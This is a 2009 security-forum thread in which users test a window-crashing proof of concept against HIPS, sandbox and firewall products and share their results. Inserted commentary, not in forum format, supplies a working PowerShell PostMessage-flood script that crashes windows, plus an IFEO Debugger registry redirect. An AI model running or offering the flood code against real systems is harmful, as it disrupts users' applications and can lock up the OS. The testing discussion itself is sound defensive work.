POC of Terminating Processes

Discussion in 'other anti-malware software' started by MagisDing, Jul 21, 2009.

Thread Status:
Not open for further replies.
  1. 3xist

    3xist Guest

    Thanks for the information.

    I'm going to re-run the test now, but I'll do a reboot first and remove it from my computer security policy.

    Cheers,
    Josh
     
  2. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    No alerts with CIS here. Proactive paranoid mode.
     
  3. nick s

    nick s Registered Member

    Joined:
    Nov 20, 2002
    Posts:
    1,430
    I ran the POC unsandboxed and targeted the open Sandboxie Control window's title. I concur that if I run the POC sandboxed, it just crashes.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Hmmm... what detection do you mean? This is a simple execution alert that will be given by any classical HIPS.
     
  5. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Do you run CIS with "Parental Control-silent mode"? :D
     
  6. tsec

    tsec Registered Member

    Joined:
    Nov 18, 2008
    Posts:
    181
    I received an alert, but only after upping the image execution control from normal to aggressive.
     
  7. MaB69

    MaB69 Registered Member

    Joined:
    Dec 9, 2005
    Posts:
    540
    Location:
    Paris
    Hi all,

    Tested this POC against :

    OA - Failed (no prompt)

    OA run safer - Failed (no prompt)

    a² Malware-IDS - Failed (no prompt)

    GeSwall - Passed, but the POC starts eating all my CPU struggling against GW

    Anyone have an idea how this POC crashes the targeted window?

    Will report OA results to Tall Emu staff

    Regards,

    MaB
     
  8. stackz

    stackz Registered Member

    Joined:
    Dec 27, 2007
    Posts:
    646
    Location:
    Sydney Australia
    The POC just uses PostMessage flood with msg 0x2700 to 0xFFFF to the target window. After this it calls FindWindow to see if the target window is still found and if so, repeats the above PM flood.
     
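The loop stackz describes, written out as an added example (this is not the POC circulated in the thread, and the download links were removed by the moderators for a reason): post every message ID from 0x2700 to 0xFFFF to the window, call FindWindow again, and repeat while the window still exists. Assumptions not in the thread: the target is found by title (the thread only says the POC takes the window title), the round cap and the short sleep between rounds are safety additions of mine, and the counters are there so you can see what a HIPS or the OS actually does with the posts. Two things worth knowing when reading the counters: a thread's message queue holds 10,000 posted messages by default, so PostMessage starts failing with ERROR_NOT_ENOUGH_QUOTA (1816) once the target stops draining it, and on Vista and later UIPI refuses posts to a window owned by a higher-integrity process with ERROR_ACCESS_DENIED (5). Run it only against a throwaway window you opened yourself, e.g. an empty Notepad.

```powershell
# Added example (not the thread's POC): PostMessage flood of 0x2700..0xFFFF,
# re-check with FindWindow, repeat while the target window still exists.
Add-Type -Namespace Win32 -Name User32 -MemberDefinition @'
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr FindWindowW(string lpClassName, string lpWindowName);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool PostMessageW(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam);
'@

function Invoke-MessageFlood {
    param(
        [Parameter(Mandatory)][string]$WindowTitle,   # assumed: POC targets by title
        [int]$MaxRounds = 3                           # safety cap, not in the original
    )
    $result = [ordered]@{ Rounds = 0; Posted = 0; Quota = 0; Denied = 0; OtherFail = 0; TargetGone = $false }

    for ($round = 1; $round -le $MaxRounds; $round++) {
        # FindWindow with a null class matches on title only
        $hwnd = [Win32.User32]::FindWindowW($null, $WindowTitle)
        if ($hwnd -eq [IntPtr]::Zero) { $result['TargetGone'] = $true; break }
        $result['Rounds'] += 1

        for ($msg = 0x2700; $msg -le 0xFFFF; $msg++) {
            if ([Win32.User32]::PostMessageW($hwnd, [uint32]$msg, [IntPtr]::Zero, [IntPtr]::Zero)) {
                $result['Posted'] += 1
                continue
            }
            # Failure reasons a tester should distinguish:
            #   1816 ERROR_NOT_ENOUGH_QUOTA  queue full (10,000 posted messages by default)
            #      5 ERROR_ACCESS_DENIED     UIPI: target window runs at a higher integrity level
            switch ([Runtime.InteropServices.Marshal]::GetLastWin32Error()) {
                1816    { $result['Quota']     += 1 }
                5       { $result['Denied']    += 1 }
                default { $result['OtherFail'] += 1 }
            }
        }
        # Added: let the target drain its queue before re-checking (the original spins)
        Start-Sleep -Milliseconds 200
    }
    [pscustomobject]$result
}

# Usage against a throwaway window you opened yourself:
# Invoke-MessageFlood -WindowTitle 'Untitled - Notepad'
```

If a product really shields a window rather than just prompting on execution, it shows up here as every post failing (Denied or OtherFail) with the target still present; a sandbox that isolates the process typically returns no handle from FindWindow at all, so TargetGone is true after zero rounds.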
  9. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    All download links have been removed from posts. Please DO NOT post links of this nature. From here on the whole post goes away.

    Thanks,

    Pete
     
  10. MaB69

    MaB69 Registered Member

    Joined:
    Dec 9, 2005
    Posts:
    540
    Location:
    Paris
    Thanks stackz for this explanation

    Regards,

    MaB
     
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Nope.

    I mean I got just execution alert.
     
    Last edited: Jul 23, 2009
  12. fax

    fax Registered Member

    Joined:
    May 30, 2005
    Posts:
    3,898
    Location:
    localhost
    Yes, of course...
     
  13. nick s

    nick s Registered Member

    Joined:
    Nov 20, 2002
    Posts:
    1,430
    Strange. Whether I click allow or deny at that prompt, notepad crashes. Tested on Vista SP2 with...

    ZoneAlarm Anti-virus version:9.0.029.000
    TrueVector version:9.0.029.000
    Driver version:9.0.029.000
    Anti-virus engine version:8.0.1.33
    Anti-virus signature DAT file version:986392800
     
  14. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Would be interesting to know results for even more software, e.g. isolating ones like DW. :)
     
  15. Wildest

    Wildest Registered Member

    Joined:
    Apr 28, 2009
    Posts:
    304
    Why is this only effective in crashing some applications and not others?
    Is this something that security software should be responsible for defending against?
     
  16. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Well, not too fun if someone makes a disguise of a .bat file which simply tries to format all sorts of drive letters without the need for confirmation, is it? :D

    Not a responsibility for the security software (maybe BB/HIPS for example actually) - at least not AM software - as it's not an attack against it (self-defense) or considered malware, but wow, what a disaster. :rolleyes:


    I may have misunderstood your message, but I wanted to write this anyway. :D
     
    Last edited: Jul 24, 2009
  17. 3xist

    3xist Guest

    COMODO are now looking into this for CIS (FYI CIS users). I will report back when they have finished analyzing this.

    Cheers,
    Josh
     
  18. tsec

    tsec Registered Member

    Joined:
    Nov 18, 2008
    Posts:
    181
    Thanks for the update mate :)
     
  19. 3xist

    3xist Guest

    First impression by Comodo (before even digging into the code of this POC) was that it's probably a Windows-message-based useless POC, because it's simply freezing/crashing applications. It's not like it's sending data to a hacker, or seriously damaging the OS.

    Of course this is only my opinion, but we need to look at: Is this a threat or an inconvenience to the user? And can this replicate/perform further malicious actions (malware in the wild?)

    ssj100, if you take a look at this thread that you created: https://forums.comodo.com/leak_testingattacksvulnerability_research/comodo_bypassed-t43061.0.html - if you read through it there are different scenarios that happen with different OSes, different CIS settings, and I am sure there are many other circumstances too... However, we CAN say that this indeed did bypass CIS.

    Anyway, I won't jump to any radical conclusions just yet... I am sure people have other opinions or scenarios about this, including Vendors. Let's wait for the results... I'll keep you updated...

    Cheers,
    Josh
     
  20. fax

    fax Registered Member

    Joined:
    May 30, 2005
    Posts:
    3,898
    Location:
    localhost
    Uuuhm.. there was no crash here.
    Yes, VISTA SP2 too...
    ZA program control with all advanced control enabled (time attack, component, etc)

    Can't test it again... moved to ZA Extreme beta and deleted the POC.
    PM the POC and will test again with ZA Extreme :D

    ZoneAlarm Extreme Security version:9.0.034.000
    TrueVector version:9.0.034.000
    Driver version:9.0.034.000
    Anti-virus engine version:8.0.1.33
    Anti-virus signature DAT file version:986407136
    Anti-spyware engine version:5.0.210.0
    Anti-spyware signature DAT file version:01.200812.5005
    AntiSpam version:6.0.0.2083
    ZoneAlarm ForceField 1.4.332.0
    ZoneAlarm ForceField Spyware Sites Database 03.740


    Fax
     
  21. nick s

    nick s Registered Member

    Joined:
    Nov 20, 2002
    Posts:
    1,430
    Just finished running the POC against the new ZA Extreme beta and get the same results. I also see that if I target the POC at ZA's UI, Vista locks up and ultimately requires a hard reset to recover. I'll PM you a link later today if you're still interested.
     
  22. nick s

    nick s Registered Member

    Joined:
    Nov 20, 2002
    Posts:
    1,430
    Although Sandboxie blocks the POC, it does generate multiple SBIE1242 Monitor buffer overflow errors if you choose to monitor the sandboxed POC with Resource Access Monitor.
     
  23. Franklin

    Franklin Registered Member

    Joined:
    May 12, 2005
    Posts:
    2,517
    Location:
    West Aussie
    These POCs can't even get past Windows if you want.
    Merge the below and try test.exe again.
    Code:
    Windows Registry Editor Version 5.00
    
    ; IFEO "Debugger": every launch of test.exe starts calc.exe instead
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\test.exe]
    "Debugger"="C:\\Windows\\System32\\calc.exe"
     
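The same Image File Execution Options key cuts both ways: Windows hands the Debugger value's executable the original command line instead of running the image, which is why Franklin's .reg stops test.exe, and also why the key is a favourite for hijacking or silencing other people's executables. As an added example (not from Franklin's post), here is the audit and the undo side in PowerShell: list every image name that currently carries a Debugger value, and remove the test.exe entry once the test is done. Both need an elevated prompt because the key lives under HKLM; the helper names are mine.

```powershell
# Added example: audit and undo for IFEO "Debugger" redirections (run elevated).
$IfeoBase = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-IfeoDebugger {
    # One object per image name that Windows will redirect at launch.
    Get-ChildItem -Path $IfeoBase -ErrorAction Stop | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{
                Image    = $_.PSChildName
                Debugger = $dbg
                # Anything that is not a real debugger deserves a second look:
                # an entry like test.exe -> calc.exe is a block, the same entry
                # pointing at an unknown binary is a hijack.
                Suspicious = ($dbg -notmatch '(windbg|vsjitdebugger|ntsd|cdb)\.exe')
            }
        }
    }
}

function Remove-IfeoDebugger {
    param([Parameter(Mandatory)][string]$Image)   # e.g. 'test.exe'
    $key = Join-Path $IfeoBase $Image
    if (Test-Path $key) {
        Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
        # Drop the subkey as well when nothing else is left in it
        if (-not (Get-ItemProperty -Path $key | Get-Member -MemberType NoteProperty | Where-Object Name -notlike 'PS*')) {
            Remove-Item -Path $key
        }
    }
}

# Usage: see the block Franklin's .reg created, then remove it after testing
Get-IfeoDebugger | Format-Table -AutoSize
# Remove-IfeoDebugger -Image 'test.exe'
```

The Suspicious flag is only a crude filter on the debugger's file name; treat any entry you did not create yourself as something to investigate, whatever it points at.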
  24. fax

    fax Registered Member

    Joined:
    May 30, 2005
    Posts:
    3,898
    Location:
    localhost
    Of course... you may be having other services/dll/sys in between that make it freeze and/or crash.
    Yours or mine? :)

    Fax
     
    Last edited: Jul 24, 2009
  25. arran

    arran Registered Member

    Joined:
    Feb 5, 2008
    Posts:
    1,156
    Hi, can someone please PM the download link so I can test with my MD rule set.
     